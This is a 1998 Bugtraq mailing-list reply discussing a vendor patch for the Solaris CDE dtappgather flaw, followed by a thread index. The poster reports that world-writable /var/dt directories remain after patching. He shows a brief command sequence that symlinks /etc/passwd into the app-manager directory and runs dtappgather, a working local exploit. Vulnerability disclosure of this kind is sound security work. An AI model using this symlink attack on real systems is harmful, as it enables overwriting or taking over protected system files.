Bugtraq mailing list archives
Re: /usr/dt/bin/dtappgather exploit
From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Wed, 25 Feb 1998 20:26:02 +0100
patches 104497 CDE 1.0.1: dtappgather patch
I'm afraid that's not enough: it fixes the DTUSERSESSION bug; but it doesn't fixes directory permisions. In a Solaris 2.5 sparc box, with patch 104497-02 you have: drwxrwxrwx 4 root root 1536 Feb 25 19:46 /var/dt drwxrwxrwx 3 bin bin 512 Jan 20 1997 /var/dt/appconfig drwxr-xr-x 4 elias robot 512 Oct 6 14:42 /var/dt/tmp ^^^^^ this is a normal non-admin account; sometimes the CDE login sessions changes it. so, it's still vulnerable to the link exploit (but yes, this is not a problem in 2.6, I don't know about 2.5.1)
nigg0r@host% ls -l /etc/passwd -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd nigg0r@host% ln -s /etc/passwd/var/dt/appconfig/appmanager/generic-display-0nigg0r@host% dtappgather
-- J.A. Gutierrez So be easy and free when you're drinking with me I'm a man you don't meet every day finger me for PGP (the pogues)
Current thread:
- /usr/dt/bin/dtappgather exploit Mastoras (Feb 23)
- Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 24)
- AOL Instant Messanger Bug Aleph One (Feb 24)
- Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files kevingeo () CRUZIO COM (Feb 25)
- Re: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary William T Wilson (Feb 25)
- Quake 2 Linux 3.13 - ref_root.so still works kevingeo () CRUZIO COM (Feb 25)
- <Possible follow-ups>
- Re: /usr/dt/bin/dtappgather exploit Steven Goldberg - SE - Seattle WA (Feb 25)
- Re: /usr/dt/bin/dtappgather exploit J.A. Gutierrez (Feb 25)